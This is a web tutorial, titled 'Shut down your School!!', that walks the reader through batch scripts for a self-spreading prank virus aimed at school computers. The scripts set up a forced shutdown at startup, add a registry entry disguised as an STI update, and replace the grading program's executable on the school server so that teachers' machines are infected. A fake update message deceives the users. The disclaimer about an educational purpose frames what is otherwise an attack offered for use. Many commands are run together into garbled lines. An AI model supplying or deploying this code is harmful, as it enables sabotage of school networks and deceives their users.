Shut down your School!!
This article is for only educational purpose, i am not responsible for any misuse of this article.
By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is
just a simple registry file that anyone can create, but I don’t feel
like explaining the registry to everyone. It will disguise itself by
claiming to be an update for STI.
Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply
gets it ready to infect the teachers. ?,$, and ! means that it varies.
It depends on what program you are using. To find out how to fill these
blank, get on a computer that has access to the server that stores your
grading program. ? is the drive letter. $ is any folders and sub folders
that contain the main exe for the grading program. ! is the name of the
main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren
C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove
C:\shutdown.batmove C:\Update.regexit
Save this as global.bat
Step 4
They grow up so fast — real fast!This script will infect any teacher
that uses STI with the shutdown command. The little viral babies will
copy themselves to the user’s hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move
?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove
?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding
information to registry.pausestart regedit.exe Update.regcd ?:\$start
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Step 5
The CureThis is a little tool that can fix all damage done by your
virus, it works in the same way that the virus works, but works to
correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file:
Now download this file:
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